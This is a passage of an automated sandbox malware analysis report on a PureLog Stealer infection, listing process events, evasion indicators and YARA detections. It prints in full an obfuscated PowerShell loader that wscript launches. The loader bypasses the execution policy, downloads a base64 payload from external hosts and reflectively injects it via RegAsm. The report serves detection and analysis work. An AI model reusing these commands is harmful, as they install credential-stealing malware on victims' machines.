              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B749F19 sldt word ptr fs:[eax]3_2_00007FFD9B749F19
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2609Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 687Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3463Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6366Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep count: 3463 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 6366 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -14757395258967632s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdnjysnwuz1cmwgpsankyddjysntkenkydodhqnkydwcycrjzovjysnl2lhnjawmtawjysnlnvzlicrj2fyy2hpdmuujysnb3jnlzi0lycrj2l0jysnzw1zlycrj2rldgenkydolw4nkydvjysndgutjysndi9ezxrhae4nkydvdgvwjysnlicrj3r4denoqscrjztnwuziyxnljysnnjrdb250zw50iccrjz0gke5ljysndycrjy1pymonkydlyycrj3qnkycgu3lzdccrj2vtlk4nkydldccrjy5xzwjdbgllbicrj3qpjysnlkrvd25sb2fkjysnu3ryaw5nkgdzricrj3vybcknkyc7zycrj1lgymluyxinkyd5jysnq29udgvudca9iccrj1ttexn0zw0nkycuq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpbmcnkycoz1knkydgyicrj2fzzscrjzy0q29udccrj2unkydujysndck7zycrj1lgyscrj3mnkydzjysnzw1ibccrj3kgpsbbumvmbccrj2vjjysndgknkydvbi5bjysnc3mnkydlbwjsescrj10nkyc6oicrj0xvywqoz1lgymknkyduyxj5jysnq29ujysndgvudccrjyk7z1lgdhlwzsa9igdzrmenkydzc2vtjysnymx5lkcnkydldfr5cgunkycoq05bunvuueunkycusccrj29tjysnzunojysnqsk7z1lgjysnbwunkyd0accrj29kid0gz1lgdccrj3lwzs5hzxrnzxrob2qoq05bvicrj0fjq05bkttnwuztzxrob2qusw52b2tlkgdzricrj251bgwsiftvymplyycrj3rbjysnxv1akenoqxr4dc4nkydbwlbqsemvntqnkyczlzg0ms4nkycymy44njenkycujysnndaxly86chr0aenoqsasienoqwrlc2f0axzhzg9dtkeglcbdtkfkzxnhdgl2yscrj2rvq04nkydbicwnkycgq04nkydbjysnzgvzyxrpdicrj2enkydkb0noqsxdjysntkfszscrj2dbc21dtkenkycsqycrj05bq05bjysnksknks5yrvbsyunfkcddtkenlftzdhjjbmddw0niyxjdmzkplnjfugxhq0uoj2dzricsjyqnksb8ic4gkcakzu5woknpbxnwrwnbncwyniwynv0tak9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdnjysnwuz1cmwgpsankyddjysntkenkydodhqnkydwcycrjzovjysnl2lhnjawmtawjysnlnvzlicrj2fyy2hpdmuujysnb3jnlzi0lycrj2l0jysnzw1zlycrj2rldgenkydolw4nkydvjysndgutjysndi9ezxrhae4nkydvdgvwjysnlicrj3r4denoqscrjztnwuziyxnljysnnjrdb250zw50iccrjz0gke5ljysndycrjy1pymonkydlyycrj3qnkycgu3lzdccrj2vtlk4nkydldccrjy5xzwjdbgllbicrj3qpjysnlkrvd25sb2fkjysnu3ryaw5nkgdzricrj3vybcknkyc7zycrj1lgymluyxinkyd5jysnq29udgvudca9iccrj1ttexn0zw0nkycuq29ujysndmvydccrj106okzyb21cyxnlnjrtjysndccrj3jpbmcnkycoz1knkydgyicrj2fzzscrjzy0q29udccrj2unkydujysndck7zycrj1lgyscrj3mnkydzjysnzw1ibccrj3kgpsbbumvmbccrj2vjjysndgknkydvbi5bjysnc3mnkydlbwjsescrj10nkyc6oicrj0xvywqoz1lgymknkyduyxj5jysnq29ujysndgvudccrjyk7z1lgdhlwzsa9igdzrmenkydzc2vtjysnymx5lkcnkydldfr5cgunkycoq05bunvuueunkycusccrj29tjysnzunojysnqsk7z1lgjysnbwunkyd0accrj29kid0gz1lgdccrj3lwzs5hzxrnzxrob2qoq05bvicrj0fjq05bkttnwuztzxrob2qusw52b2tlkgdzricrj251bgwsiftvymplyycrj3rbjysnxv1akenoqxr4dc4nkydbwlbqsemvntqnkyczlzg0ms4nkycymy44njenkycujysnndaxly86chr0aenoqsasienoqwrlc2f0axzhzg9dtkeglcbdtkfkzxnhdgl2yscrj2rvq04nkydbicwnkycgq04nkydbjysnzgvzyxrpdicrj2enkydkb0noqsxdjysntkfszscrj2dbc21dtkenkycsqycrj05bq05bjysnksknks5yrvbsyunfkcddtkenlftzdhjjbmddw0niyxjdmzkplnjfugxhq0uoj2dzricsjyqnksb8ic4gkcakzu5woknpbxnwrwnbncwyniwynv0tak9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('g'+'yfurl = '+'c'+'na'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/detahn'+'otev'+'.'+'txtcna'+';gyfbase'+'64content '+'= (ne'+'w'+'-obj'+'ec'+'t'+' syst'+'em.n'+'et'+'.webclien'+'t)'+'.download'+'string(gyf'+'url)'+';g'+'yfbinar'+'y'+'content = '+'[system'+'.con'+'vert'+']::frombase64s'+'t'+'ring'+'(gy'+'fb'+'ase'+'64cont'+'e'+'n'+'t);g'+'yfa'+'s'+'s'+'embl'+'y = [refl'+'ec'+'ti'+'on.a'+'ss'+'embly'+']'+'::'+'load(gyfbi'+'nary'+'con'+'tent'+');gyftype = gyfa'+'ssem'+'bly.g'+'ettype'+'(cnarunpe'+'.h'+'om'+'ecn'+'a);gyf'+'me'+'th'+'od = gyft'+'ype.getmethod(cnav'+'aicna);gyfmethod.invoke(gyf'+'null, [objec'+'t['+']]@(cnatxt.'+'azpphc/54'+'3/841.'+'23.861'+'.'+'401//:ptthcna , cnadesativadocna , cnadesativa'+'docn'+'a ,'+' cn'+'a'+'desativ'+'a'+'docna,c'+'nare'+'gasmcna'+',c'+'nacna'+'))').replace('cna',[string][char]39).replace('gyf','$') | . ( $env:comspec[4,26,25]-join'')"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a636ef0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.powershell.exe.1a62f612b80.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
